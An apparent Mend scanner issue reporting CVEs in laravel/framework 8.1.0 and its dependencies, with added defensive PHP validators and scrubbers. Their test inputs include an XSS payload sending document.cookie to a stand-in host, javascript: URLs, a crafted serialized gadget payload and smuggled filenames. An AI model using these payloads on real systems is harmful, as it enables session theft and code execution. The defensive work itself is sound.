
laravel/framework-v8.1.0: 12 vulnerabilities (highest severity is: 9.8) #8

@mend-for-github-com

Description

Vulnerable Library - laravel/framework-v8.1.0

The Laravel Framework.

Library home page: https://api.github.com/repos/laravel/framework/zipball/d769a497a20e4a374ff7454dde7eee65145e3659

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Vulnerabilities

| Vulnerability | Severity | CVSS | Dependency | Type | Fixed in (laravel/framework-v8.1.0 version) | Remediation Possible** |
|---|---|---|---|---|---|---|
| CVE-2025-27515 | Critical | 9.8 | laravel/framework-v8.1.0 | Direct | v11.44.1 | |
| CVE-2021-43617 | Critical | 9.8 | laravel/framework-v8.1.0 | Direct | Debian 11 packages php-laravel-framework and php-illuminate-* at 6.20.14+dfsg-2+deb11u1 (full package list under Details) | |
| CVE-2021-32708 | Critical | 9.8 | league/flysystem-1.1.3 | Transitive | N/A* | |
| CVE-2021-21263 | High | 7.2 | laravel/framework-v8.1.0 | Direct | v6.20.11, v7.30.2, v8.22.1 | |
| CVE-2021-41267 | Medium | 6.5 | symfony/http-kernel-v5.1.5 | Transitive | N/A* | |
| CVE-2025-46734 | Medium | 6.4 | league/commonmark-1.5.5 | Transitive | N/A* | |
| CVE-2022-24894 | Medium | 5.9 | symfony/http-kernel-v5.1.5 | Transitive | N/A* | |
| CVE-2021-43808 | Medium | 5.3 | laravel/framework-v8.1.0 | Direct | v6.20.42, v7.30.6, v8.75.0 | |
| CVE-2024-28859 | Medium | 5.0 | swiftmailer/swiftmailer-v6.2.3 | Transitive | N/A* | |
| CVE-2024-50345 | Low | 3.1 | symfony/http-foundation-v5.1.5 | Transitive | N/A* | |
| CVE-2024-52301 | Low | 0.0 | laravel/framework-v8.1.0 | Direct | laravel/framework 6.20.45, 7.30.7, 8.83.28, 9.52.17, 10.48.23, 11.31.0 | |
| CVE-2024-51736 | Low | 0.0 | symfony/process-v5.1.5 | Transitive | N/A* | |

*For some transitive vulnerabilities there is no version of the direct dependency that carries a fix. Check the "Details" section below for a version of the transitive dependency in which the vulnerability is fixed. In a Composer project such a version can also be pulled in directly with composer require, as long as laravel/framework's own constraint on that package allows it.

**In some cases a remediation PR cannot be created automatically even though a remediation exists.

Details

CVE-2025-27515

Vulnerable Library - laravel/framework-v8.1.0

The Laravel Framework.

Library home page: https://api.github.com/repos/laravel/framework/zipball/d769a497a20e4a374ff7454dde7eee65145e3659

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Laravel is a web application framework. When wildcard validation is used to validate a file or image field ("files.*"), a crafted request can bypass the validation rules. The vulnerability is fixed in 11.44.1 and 12.1.1. Both fixed versions are in the 11.x and 12.x series and the scanner lists no 8.x fix, so confirm the affected version range in GHSA-78fx-h6xr-vch4 before treating this finding as applicable to a laravel/framework 8.1.0 install; if it does apply, the remediation is a major-version upgrade, not a patch release.

Publish Date: 2025-03-05

URL: CVE-2025-27515

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-78fx-h6xr-vch4

Release Date: 2025-03-05

Fix Resolution: v11.44.1

CVE-2021-43617

Vulnerable Library - laravel/framework-v8.1.0

The Laravel Framework.

Library home page: https://api.github.com/repos/laravel/framework/zipball/d769a497a20e4a374ff7454dde7eee65145e3659

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Laravel Framework through 8.70.2 does not sufficiently block the upload of executable PHP content because Illuminate/Validation/Concerns/ValidatesAttributes.php lacks a check for .phar files, which are handled as application/x-httpd-php on Debian-based systems. NOTE: this CVE record is for Laravel Framework and is unrelated to any reports about incorrectly written user applications for image upload. The fix resolution the scanner lists below is Debian's packaging of 6.20.14 (a bullseye security update), not a Composer version; for a Composer-managed project the remediation is to move laravel/framework to a release later than 8.70.2 and, independently of the framework version, to keep user uploads out of any directory from which the web server will execute PHP.

Publish Date: 2021-11-14

URL: CVE-2021-43617

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://nvd.nist.gov/vuln/detail/CVE-2021-43617

Release Date: 2021-11-14

Fix Resolution: the following Debian 11 (bullseye) packages at 6.20.14+dfsg-2+deb11u1: php-laravel-framework, php-illuminate-auth, php-illuminate-broadcasting, php-illuminate-bus, php-illuminate-cache, php-illuminate-config, php-illuminate-console, php-illuminate-container, php-illuminate-contracts, php-illuminate-cookie, php-illuminate-database, php-illuminate-encryption, php-illuminate-events, php-illuminate-filesystem, php-illuminate-hashing, php-illuminate-http, php-illuminate-log, php-illuminate-mail, php-illuminate-notifications, php-illuminate-pagination, php-illuminate-pipeline, php-illuminate-queue, php-illuminate-redis, php-illuminate-routing, php-illuminate-session, php-illuminate-support, php-illuminate-translation, php-illuminate-validation, php-illuminate-view

CVE-2021-32708

Vulnerable Library - league/flysystem-1.1.3

Filesystem abstraction: Many filesystems, one API.

Library home page: https://api.github.com/repos/thephpleague/flysystem/zipball/9be3b16c877d477357c015cec057548cf9b2a14a

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • league/flysystem-1.1.3 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Flysystem is an open source file storage library for PHP. The whitespace normalisation used in 1.x and 2.x removes any Unicode whitespace. Under specific conditions this could allow a malicious user to execute code remotely. All of the following must hold:

  • a user is allowed to supply the path or filename of an uploaded file;
  • the supplied path or filename is not checked for Unicode characters;
  • the supplied path or filename is checked against an extension deny-list rather than an allow-list;
  • the supplied path or filename contains a Unicode whitespace character in the extension;
  • the uploaded file is stored in a directory from which PHP code can be executed.

Given these conditions, a user can upload and execute arbitrary code on the attacked system. The Unicode whitespace removal has been replaced with a rejection (an exception is thrown). 1.x users should upgrade to 1.1.4; 2.x users to 2.1.1. Laravel's Storage facade wraps Flysystem, so either a laravel/framework upgrade that raises the flysystem constraint or a direct composer require of a fixed version closes this.
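Added example (PHP, not code from laravel/framework or league/flysystem): a filename check that addresses the three upload findings on this page together, CVE-2025-27515 (validate every file the request actually carried, not only the keys a "files.*" rule matched), CVE-2021-43617 (.phar is executable) and CVE-2021-32708 (reject rather than strip Unicode whitespace). The class name, the extension lists and the $_FILES-shaped sample input are my own constructions.

```php
<?php
declare(strict_types=1);

// Added example, not code from laravel/framework or league/flysystem.
// UploadCheck and both extension lists are my own choices for illustration.
final class UploadCheck
{
    /** Extensions this hypothetical app serves. An allow-list, never a deny-list. */
    private const ALLOWED = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];

    /** Extensions a PHP-enabled web server may execute; .phar is the one CVE-2021-43617 is about. */
    private const EXECUTABLE = ['php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml', 'phps', 'phar'];

    /** Returns null when $filename is acceptable, otherwise the reason for rejecting it. */
    public static function rejectReason(string $filename): ?string
    {
        if (preg_match('//u', $filename) !== 1) {
            return 'filename is not valid UTF-8';
        }
        // CVE-2021-32708: reject Unicode control/format characters and any
        // non-ASCII space outright instead of stripping them. Stripping turns
        // "shell.php\u{200B}" (which a deny-list let through) into "shell.php".
        if (preg_match('/\p{C}|(?! )\p{Z}/u', $filename) === 1) {
            return 'control or Unicode whitespace character in filename';
        }
        // No path separators, and no dotfiles such as .htaccess.
        if (strpbrk($filename, "/\\") !== false || str_starts_with($filename, '.')) {
            return 'path separator or leading dot in filename';
        }
        $parts = explode('.', strtolower($filename));
        array_shift($parts);                       // drop the base name
        if ($parts === [] || end($parts) === '') {
            return 'missing extension';
        }
        // Check every suffix, not just the last one: "x.phar.png" is still
        // executed by servers that map a handler onto any .phar segment.
        foreach ($parts as $suffix) {
            if (in_array($suffix, self::EXECUTABLE, true)) {
                return "executable extension .$suffix";
            }
        }
        if (!in_array(end($parts), self::ALLOWED, true)) {
            return 'extension .' . end($parts) . ' not in allow-list';
        }
        return null;
    }

    /**
     * CVE-2025-27515: instead of validating only the keys a "files.*" rule
     * happens to match, walk every file the request actually carried.
     * $files has the shape of $_FILES. Returns [field => reason] for rejects.
     */
    public static function rejectAll(array $files): array
    {
        $rejected = [];
        foreach ($files as $field => $entry) {
            $names = is_array($entry['name']) ? $entry['name'] : [$entry['name']];
            foreach ($names as $index => $name) {
                $reason = self::rejectReason((string) $name);
                if ($reason !== null) {
                    $rejected[sprintf('%s[%s]', $field, $index)] = $reason;
                }
            }
        }
        return $rejected;
    }
}

// Constructed sample shaped like $_FILES; nothing is actually uploaded.
$files = [
    'files'  => ['name' => ['report.pdf', "shell.php\u{200B}", 'archive.phar', 'x.phar.png']],
    'avatar' => ['name' => 'me.png'],   // not matched by a "files.*" rule, still checked
];
print_r(UploadCheck::rejectAll($files));
```

Pair this with a content check on the temporary file (finfo) and store uploads outside the document root, or under a path the server never hands to the PHP handler; the name check alone only removes the routes these three advisories describe.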

Publish Date: 2021-06-24

URL: CVE-2021-32708

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: GHSA-9f46-5r25-5wfm

Release Date: 2021-06-24

Fix Resolution: 1.1.4,2.1.1

CVE-2021-21263

Vulnerable Library - laravel/framework-v8.1.0

The Laravel Framework.

Library home page: https://api.github.com/repos/laravel/framework/zipball/d769a497a20e4a374ff7454dde7eee65145e3659

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Laravel is a web application framework. Versions of Laravel before 6.20.11, 7.30.2 and 8.22.1 contain a query-binding issue. The same issue applies to the illuminate/database package used by Laravel. If a request is crafted so that a field that is normally a non-array value is an array, and that input is not validated or cast to its expected type before being passed to the query builder, an unexpected number of query bindings can be added to the query. In some situations this simply leads to no results being returned by the query builder; however, certain queries could be affected in a way that causes them to return unexpected results.
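Added example, not Laravel's query builder: TinyWhere models the single behaviour CVE-2021-21263 describes, namely an array value contributing several positional bindings to a clause with one placeholder, and expectScalar() is the input check the advisory says was missing. The users table, the request body and the SQLite database are constructed for the demonstration (requires ext-pdo_sqlite).

```php
<?php
declare(strict_types=1);

// Added example, not Laravel's query builder. TinyWhere models only the one
// behaviour the advisory describes: an array value contributes several
// positional bindings to a clause that has a single "?" placeholder.
final class TinyWhere
{
    private array $clauses = [];
    private array $bindings = [];

    public function where(string $column, mixed $value): self
    {
        $this->clauses[] = "$column = ?";
        foreach (is_array($value) ? $value : [$value] as $v) {   // flattening
            $this->bindings[] = $v;
        }
        return $this;
    }

    public function toSql(string $table): string
    {
        return "SELECT id, username, role FROM $table WHERE " . implode(' AND ', $this->clauses);
    }

    public function bindings(): array
    {
        return $this->bindings;
    }
}

/** Shows how positional bindings actually line up with the placeholders. */
function pairBindings(string $sql, array $bindings): array
{
    $n = substr_count($sql, '?');
    return [
        'placeholders' => $n,
        'bound'        => array_slice($bindings, 0, $n),
        'leftover'     => array_slice($bindings, $n),
    ];
}

/** The fix on the application side: refuse anything but a scalar for a scalar field. */
function expectScalar(array $input, string $key): string
{
    if (!isset($input[$key]) || is_array($input[$key])) {
        throw new InvalidArgumentException("$key must be a single value");
    }
    return (string) $input[$key];
}

// Constructed request body: the attacker sends username[]=alice&username[]=admin
$request = ['username' => ['alice', 'admin']];

// Pre-fix behaviour: the second array element slides into the role placeholder
// and the hard-coded 'user' falls off the end, so the role constraint is now
// attacker-controlled.
$q = (new TinyWhere())->where('username', $request['username'])->where('role', 'user');
print_r(pairBindings($q->toSql('users'), $q->bindings()));

// With the input check in place the request is rejected before it reaches SQL.
try {
    expectScalar($request, 'username');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}

// A well-typed request goes through normally, run here against in-memory SQLite.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)');
$pdo->exec("INSERT INTO users (username, role) VALUES ('alice', 'user'), ('admin', 'admin')");
$q = (new TinyWhere())
    ->where('username', expectScalar(['username' => 'alice'], 'username'))
    ->where('role', 'user');
$stmt = $pdo->prepare($q->toSql('users'));
$stmt->execute($q->bindings());
print_r($stmt->fetchAll(PDO::FETCH_ASSOC));
```

Whether the leftover binding raises a driver error or is silently dropped depends on the PDO driver, which is why the advisory describes both "no results" and "unexpected results"; the check at the request boundary is the part that does not depend on the driver.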

Publish Date: 2021-01-19

URL: CVE-2021-21263

CVSS 3 Score Details (7.2)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: GHSA-3p32-j457-pg5x

Release Date: 2021-01-19

Fix Resolution: v6.20.11,v7.30.2,v8.22.1

CVE-2021-41267

Vulnerable Library - symfony/http-kernel-v5.1.5

Symfony HttpKernel Component

Library home page: https://api.github.com/repos/symfony/http-kernel/zipball/3e32676e6cb5d2081c91a56783471ff8a7f7110b

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • symfony/http-kernel-v5.1.5 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Symfony/Http-Kernel is the HTTP kernel component for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Headers that are not part of the "trusted_headers" allowed list are ignored, which protects users from cache poisoning attacks. In Symfony 5.2 the maintainers added support for the "X-Forwarded-Prefix" header, but this header was accessible in a SubRequest even when it was not part of the "trusted_headers" allowed list. An attacker could forge requests containing an "X-Forwarded-Prefix" header, leading to web cache poisoning. Versions 5.3.12 and later contain a patch ensuring that the "X-Forwarded-Prefix" header is not forwarded to subrequests when it is not trusted. Note that the description places the introduction of "X-Forwarded-Prefix" support in Symfony 5.2 while the version flagged here is 5.1.5; check the advisory's affected range before spending effort on this finding. There is no configuration workaround, since the bug bypasses the trusted-header list itself; only the upgrade fixes it.

Publish Date: 2021-11-24

URL: CVE-2021-41267

CVSS 3 Score Details (6.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: High
    • Availability Impact: None

CVE-2025-46734

Vulnerable Library - league/commonmark-1.5.5

Highly-extensible PHP Markdown parser which fully supports the CommonMark spec and Github-Flavored Markdown (GFM)

Library home page: https://api.github.com/repos/thephpleague/commonmark/zipball/45832dfed6007b984c0d40addfac48d403dc6432

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • league/commonmark-1.5.5 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

league/commonmark is a PHP Markdown parser. A cross-site scripting (XSS) vulnerability in the Attributes extension of the league/commonmark library (versions 1.5.0 through 2.6.x) allows remote attackers to insert malicious JavaScript calls into HTML. The league/commonmark library provides configuration options such as "html_input: 'strip'" and "allow_unsafe_links: false" to mitigate cross-site scripting (XSS) attacks by stripping raw HTML and disallowing unsafe links. However, when the Attributes Extension is enabled, it introduces a way for users to inject arbitrary HTML attributes into elements via Markdown syntax using curly braces. Version 2.7.0 contains three changes to prevent this XSS attack vector: All attributes starting with "on" are considered unsafe and blocked by default; support for an explicit allowlist of allowed HTML attributes; and manually-added "href" and "src" attributes now respect the existing "allow_unsafe_links" configuration option. If upgrading is not feasible, please consider disabling the "AttributesExtension" for untrusted users and/or filtering the rendered HTML through a library like HTMLPurifier.
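Added example, not league/commonmark's code and not HTMLPurifier: a post-render scrub for the case the advisory describes, where the Attributes extension is enabled for untrusted authors and the rendered HTML has to be cleaned afterwards. It removes every on* attribute, style and srcdoc, and any URL attribute whose scheme is not http, https or mailto. The sample fragment is constructed to look like what {onclick=...}-style Markdown would produce; RenderedHtmlScrub and its attribute lists are my own. Requires ext-dom and PHP 8.

```php
<?php
declare(strict_types=1);

// Added example, not league/commonmark's code and not HTMLPurifier. A small
// post-render scrub for HTML produced from Markdown written by untrusted users:
// it drops the attribute classes the advisory describes as the attack surface.
final class RenderedHtmlScrub
{
    private const URL_ATTRIBUTES = ['href', 'src', 'action', 'formaction', 'xlink:href'];
    private const SAFE_SCHEMES   = ['http', 'https', 'mailto'];

    public static function scrub(string $fragment): string
    {
        $doc = new DOMDocument();
        $previous = libxml_use_internal_errors(true);   // silence tag-soup warnings
        $doc->loadHTML(
            '<?xml encoding="UTF-8"><div id="scrub-root">' . $fragment . '</div>',
            LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD
        );
        libxml_use_internal_errors($previous);

        $xpath = new DOMXPath($doc);
        // Snapshot first: removing nodes while walking a live list skips entries.
        $attributes = iterator_to_array($xpath->query('//@*'), false);
        foreach ($attributes as $attr) {
            $name = strtolower($attr->nodeName);
            $drop = str_starts_with($name, 'on')                        // onclick, onerror, ...
                 || $name === 'style' || $name === 'srcdoc'
                 || (in_array($name, self::URL_ATTRIBUTES, true) && !self::safeUrl($attr->nodeValue));
            if ($drop) {
                $attr->ownerElement->removeAttributeNode($attr);
            }
        }

        $root = $xpath->query('//div[@id="scrub-root"]')->item(0);
        $out = '';
        foreach ($root->childNodes as $child) {
            $out .= $doc->saveHTML($child);
        }
        return $out;
    }

    /** Allow relative URLs and a short list of schemes; everything else is dropped. */
    private static function safeUrl(string $url): bool
    {
        // Browsers ignore control characters and whitespace inside "java\tscript:",
        // so strip them before looking at the scheme.
        $probe = strtolower(preg_replace('/[\x00-\x20]+/', '', $url));
        if (preg_match('/^([a-z][a-z0-9+.-]*):/', $probe, $m) !== 1) {
            return true;                                   // no scheme: relative URL
        }
        return in_array($m[1], self::SAFE_SCHEMES, true);
    }
}

// Constructed rendered output of the kind the Attributes extension lets an
// author produce from Markdown such as [x](/ok){onclick="..."}.
$rendered = '<p><a href="/ok" onclick="fetch(\'//evil.example/?c=\'+document.cookie)">x</a>'
          . '<img src="x" onerror="alert(1)">'
          . '<a href="JavaScript:alert(2)">y</a>'
          . '<a href="java&#9;script:alert(3)">z</a></p>';
echo RenderedHtmlScrub::scrub($rendered), PHP_EOL;
```

Call it on the converter's output (in commonmark 2.x, scrub($converter->convert($markdown)->getContent())) and keep the library-level settings the advisory mentions (html_input: strip, allow_unsafe_links: false) in place; the scrub is a second layer, not a replacement for upgrading to 2.7.0 or for disabling AttributesExtension for untrusted authors.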

Publish Date: 2025-05-05

URL: CVE-2025-46734

CVSS 3 Score Details (6.4)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: GHSA-3527-qv2q-pfvx

Release Date: 2025-05-05

Fix Resolution: league/commonmark - 2.7.0

CVE-2022-24894

Vulnerable Library - symfony/http-kernel-v5.1.5

Symfony HttpKernel Component

Library home page: https://api.github.com/repos/symfony/http-kernel/zipball/3e32676e6cb5d2081c91a56783471ff8a7f7110b

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • symfony/http-kernel-v5.1.5 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The Symfony HTTP cache system acts as a reverse proxy: it caches entire responses (including headers) and returns them to clients. After a recent change in the "AbstractSessionListener", the response may contain a "Set-Cookie" header. If the Symfony HTTP cache is enabled, such a response might be stored and returned to subsequent clients. An attacker can use this to retrieve the victim's session. This issue has been patched; the fix is available for branch 4.4. A shared cache that stores a "Set-Cookie" header leaks one user's session to the next regardless of framework, so also confirm that any reverse proxy or CDN in front of the application refuses to store responses that carry "Set-Cookie".

Publish Date: 2023-02-03

URL: CVE-2022-24894

CVSS 3 Score Details (5.9)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: Low
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: Low
    • Availability Impact: Low

CVE-2021-43808

Vulnerable Library - laravel/framework-v8.1.0

The Laravel Framework.

Library home page: https://api.github.com/repos/laravel/framework/zipball/d769a497a20e4a374ff7454dde7eee65145e3659

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Laravel is a web application framework. Laravel prior to versions 8.75.0, 7.30.6, and 6.20.42 contain a possible cross-site scripting (XSS) vulnerability in the Blade templating engine. A broken HTML element may be clicked and the user taken to another location in their browser due to XSS. This is due to the user being able to guess the parent placeholder SHA-1 hash by trying common names of sections. If the parent template contains an exploitable HTML structure an XSS vulnerability can be exposed. This vulnerability has been patched in versions 8.75.0, 7.30.6, and 6.20.42 by determining the parent placeholder at runtime and using a random hash that is unique to each request.

Publish Date: 2021-12-07

URL: CVE-2021-43808

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: High
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: GHSA-66hf-2p6w-jqfw

Release Date: 2021-12-07

Fix Resolution: v6.20.42, v7.30.6, v8.75.0

CVE-2024-28859

Vulnerable Library - swiftmailer/swiftmailer-v6.2.3

Swiftmailer, free feature-rich PHP mailer

Library home page: https://api.github.com/repos/swiftmailer/swiftmailer/zipball/149cfdf118b169f7840bbe3ef0d4bc795d1780c9

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • swiftmailer/swiftmailer-v6.2.3 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Symfony1 is a community fork of symfony 1.4 with DIC, form enhancements, the latest Swiftmailer, better performance, Composer compatibility and PHP 8 support. Symfony 1 has a gadget chain, due to its vulnerable Swift Mailer dependency, that enables remote code execution if a developer unserializes user input in their project. The vulnerability presents no direct threat but is a vector that enables remote code execution if a developer deserializes untrusted user data. Symfony 1 depends on Swift Mailer, which has been bundled by default in the vendor directory since 1.3.0. Swift Mailer classes implement some "__destruct()" methods, which are called when PHP destroys the object in memory. However, it is possible to include any object type in "$this->_keys" so that PHP accesses array/object properties other than those the developer intended; in particular, the array access triggered by foreach($this->_keys ...) can be abused for any class implementing the ArrayAccess interface. This may allow an attacker to execute any PHP command, leading to remote code execution. This issue has been addressed in version 1.5.18. Users are advised to upgrade. There are no known workarounds for this vulnerability. For this project the listed fix (symfony1 1.5.18) does not apply: the gadget lives in swiftmailer/swiftmailer itself, which laravel/framework 8.x pulls in and which is no longer maintained (Laravel 9 replaced it with symfony/mailer). The exposure exists only where the application calls unserialize() on data a client controls, so the practical remediation is to remove or restrict such calls and to plan the upgrade away from Swift Mailer.
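Added example, not Swift Mailer's or symfony1's code: CleanupTask is a stand-in for a class with a __destruct() that acts on its own properties, the shape of gadget the advisory describes, and the serialized payload is constructed by hand. It shows that the destructor runs on a plain unserialize() of attacker data and does not run when allowed_classes is false.

```php
<?php
declare(strict_types=1);

// Added example; CleanupTask is a stand-in for a class with a __destruct()
// that acts on its own properties, the shape of gadget the advisory describes
// in Swift Mailer. Nothing here is Swift Mailer's or symfony1's code.
final class SideEffects
{
    /** Records what a real gadget would have done, so the demo stays harmless. */
    public static array $log = [];
}

final class CleanupTask
{
    public array $paths = [];

    public function __destruct()
    {
        foreach ($this->paths as $p) {
            SideEffects::$log[] = "unlink($p)";   // a real gadget would unlink() here
        }
    }
}

/** What an application must never do with data a client controls. */
function loadUnsafe(string $payload): mixed
{
    return unserialize($payload);
}

/** Same call, but no application class is instantiated: objects of unknown
 *  classes become __PHP_Incomplete_Class, whose lifecycle methods never run. */
function loadSafe(string $payload): mixed
{
    return unserialize($payload, ['allowed_classes' => false]);
}

function demo(): array
{
    // Constructed attacker-controlled payload, written by hand so that no
    // CleanupTask object exists in this process before unserialize() runs.
    $payload = 'O:11:"CleanupTask":1:{s:5:"paths";a:1:{i:0;s:11:"/etc/passwd";}}';

    SideEffects::$log = [];
    $obj = loadUnsafe($payload);
    unset($obj);                       // __destruct() fires here
    $afterUnsafe = SideEffects::$log;

    SideEffects::$log = [];
    $obj = loadSafe($payload);
    $class = get_class($obj);
    unset($obj);                       // nothing runs for an incomplete class
    $afterSafe = SideEffects::$log;

    return ['unsafe' => $afterUnsafe, 'safe' => $afterSafe, 'safe_class' => $class];
}

print_r(demo());
```

allowed_classes => false is the minimum; where the application needs structured data from a client, json_decode() avoids the object graph entirely, and grepping the code base for unserialize( with a non-literal argument is the audit that tells you whether this finding is reachable at all.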

Publish Date: 2024-03-15

URL: CVE-2024-28859

CVSS 3 Score Details (5.0)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: Low

CVE-2024-50345

Vulnerable Library - symfony/http-foundation-v5.1.5

Symfony HttpFoundation Component

Library home page: https://api.github.com/repos/symfony/http-foundation/zipball/41a4647f12870e9d41d9a7d72ff0614a27208558

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • symfony/http-foundation-v5.1.5 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

symfony/http-foundation is a component of the Symfony PHP framework that defines an object-oriented layer for the HTTP specification. The "Request" class does not parse URIs with special characters the same way browsers do. As a result, an attacker can trick a validator relying on the "Request" class into redirecting users to another domain. The "Request::create" methods now assert that the URI does not contain invalid characters as defined by https://url.spec.whatwg.org/. This issue has been patched in versions 5.4.46, 6.4.14, and 7.1.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.
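Added example, not Symfony's Request code: a redirect-target validator that applies the same rule as the CVE-2024-50345 fix, rejecting a URI that contains characters the WHATWG URL standard does not allow before anything is parsed, then checking what parse_url() reports. The forbidden-character set is my reading of the standard's URL code points, and the allowed host and candidate URLs are constructed.

```php
<?php
declare(strict_types=1);

// Added example, not Symfony's Request code. It applies the same idea as the
// fix: refuse a URI that contains characters the WHATWG URL standard does not
// allow, before any parsing, then validate what parse_url() reports.
// The forbidden-character set is my reading of the standard's "URL code
// points"; $allowedHosts is whatever the application considers its own.
function safeRedirectTarget(string $url, array $allowedHosts): ?string
{
    // Controls, space, DEL and "<>\^`{|} are never valid in a URL. Browsers
    // "repair" some of them (a backslash becomes a slash); parse_url() does not,
    // and that disagreement is what lets a validator approve the wrong host.
    if (preg_match('/[\x00-\x20\x7F"<>\\\\^`{|}]/', $url) === 1) {
        return null;
    }
    // Local redirect: a single leading slash, not "//host" (scheme-relative).
    if (str_starts_with($url, '/') && !str_starts_with($url, '//')) {
        return $url;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;   // "https://trusted@evil" style tricks
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (!in_array(strtolower($parts['host']), $allowedHosts, true)) {
        return null;
    }
    return $url;
}

// Constructed candidates of the kind a ?return= parameter might carry.
$allowed = ['app.example.com'];
foreach ([
    'https://app.example.com/dashboard',
    '/dashboard',
    '//evil.example/dashboard',
    'https://app.example.com@evil.example/',
    'https://app.example.com\\@evil.example/',
    "https://app.example.com\t.evil.example/",
    'javascript:alert(1)',
] as $candidate) {
    printf("%-45s -> %s\n", json_encode($candidate), safeRedirectTarget($candidate, $allowed) ?? 'rejected');
}
```

Rejecting rather than normalising is the point: once a validator and a browser disagree about where a string leads, no amount of post-parse checking recovers, so the string has to be refused before parse_url() sees it.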

Publish Date: 2024-11-06

URL: CVE-2024-50345

CVSS 3 Score Details (3.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: None
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: GHSA-mrqx-rp3w-jpjp

Release Date: 2024-11-06

